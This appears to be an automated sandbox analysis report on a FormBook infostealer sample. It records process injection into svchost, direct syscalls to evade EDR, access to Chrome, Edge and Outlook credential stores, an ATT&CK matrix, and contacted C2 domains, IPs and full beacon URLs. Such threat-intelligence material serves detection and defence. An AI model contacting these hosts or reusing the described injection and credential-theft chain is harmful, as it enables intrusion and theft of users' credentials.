                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtUnmapViewOfSection: Direct from: 0x77672D3CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\Atuserer.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: NULL target: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\Atuserer.exeThread register set: target process: 7428Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\Atuserer.exeThread APC queued: target process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 334008Jump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00398A73 LogonUserW,2_2_00398A73
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00343B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,2_2_00343B4C
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00344A35
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A4CFA mouse_event,2_2_003A4CFA
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"Jump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeProcess created: C:\Windows\SysWOW64\Atuserer.exe "C:\Windows\SysWOW64\Atuserer.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003981D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_003981D4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003A4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_003A4A08
                Source: RO2Y11yOJ7.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: RO2Y11yOJ7.exe, avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: avRLXQyosx.exe, 00000006.00000000.1588919670.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3161013385.0000000000D01000.00000002.00000001.00040000.00000000.sdmp, avRLXQyosx.exe, 00000008.00000000.1744270504.00000000016C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003687AB cpuid 2_2_003687AB
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00375007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00375007
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0038215F GetUserNameW,2_2_0038215F
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003740BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_003740BA
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00344AFE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\Atuserer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_81
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_XP
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_XPe
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_VISTA
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_7
                Source: RO2Y11yOJ7.exeBinary or memory string: WIN_8
                Source: RO2Y11yOJ7.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.4c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3153276903.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675780203.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1675422438.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3163418586.0000000000E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1676172842.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3158152521.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3163670686.00000000023F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_003B6399
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003B685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_003B685D
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00377C21 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,2_2_00377C21

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551211 Sample: RO2Y11yOJ7.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 28 www.7153115.xyz 2->28 30 www.tingba.sbs 2->30 32 10 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 RO2Y11yOJ7.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 avRLXQyosx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 Atuserer.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 avRLXQyosx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.jllllbx.top 156.234.28.94, 50002, 50003, 50004 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 22->34 36 www.5hdgb2p9a.buzz 168.76.221.252, 49982, 49983, 49984 ULTRANETSERVICOSEMINTERNETLTDABR South Africa 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RO2Y11yOJ7.exe68%ReversingLabsWin32.Trojan.AutoitInject
                RO2Y11yOJ7.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.lnnn.fun/u5w9/0%Avira URL Cloudsafe
                http://www.onamae.com/?banner_id=6340%Avira URL Cloudsafe
                http://www.7153115.xyz/dblf/100%Avira URL Cloudmalware
                http://www.budged.net/zslv/0%Avira URL Cloudsafe
                http://www.jllllbx.top/14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth0%Avira URL Cloudsafe
                http://www.lexjetcenter.net/ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth0%Avira URL Cloudsafe
                http://www.5hdgb2p9a.buzz/nl7t/0%Avira URL Cloudsafe
                http://www.gmo.jp/images/public/common/logo.gif0%Avira URL Cloudsafe
                http://www.jllllbx.top/14ny/0%Avira URL Cloudsafe
                http://www.j252mv.site/bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth0%Avira URL Cloudsafe
                http://www.onamae-server.com/0%Avira URL Cloudsafe
                http://www.j252mv.site/bjtw/0%Avira URL Cloudsafe
                http://www.elarac.top/favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg==0%Avira URL Cloudsafe
                http://www.lnnn.fun/u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth0%Avira URL Cloudsafe
                http://www.elarac.top/favd/0%Avira URL Cloudsafe
                http://www.tingba.sbs/njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug==0%Avira URL Cloudsafe
                http://www.jllllbx.top0%Avira URL Cloudsafe
                http://www.tingba.sbs/njro/0%Avira URL Cloudsafe
                http://www.7153115.xyz/dblf/?eL-x=xA4m52UOO3AWG6dLOPkkJ91gfa/sOtMUS9WQ9/7Ili2Upd70ADnAJWaIHnvs9U+whG/nDh7qG8iCbCHdOukQeWX5e+ZPWvcCIT2YOJAlrSuLiE5N6g==&wFVH=-zwTKPF0iPth100%Avira URL Cloudmalware
                http://www.budged.net/zslv/?eL-x=EUn3g8LYsBqqsV8ZNTlu3xKd6tkG7Tp6GSwv0X2RMky81SP9KPrWQ2UszFzoalUNSIFimuT2bUDct3BiYGyyefEtviAnix38iMVeAihtAydc/vF2ig==&wFVH=-zwTKPF0iPth0%Avira URL Cloudsafe
                https://00808.vip/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.lnnn.fun
                		188.114.96.3
                		truetrue
                  		unknown
                  www.7153115.xyz
                  		103.249.106.91
                  		truetrue
                    		unknown
                    www.jllllbx.top
                    		156.234.28.94
                    		truetrue
                      		unknown
                      lexjetcenter.net
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.elarac.top
                        		192.64.118.221
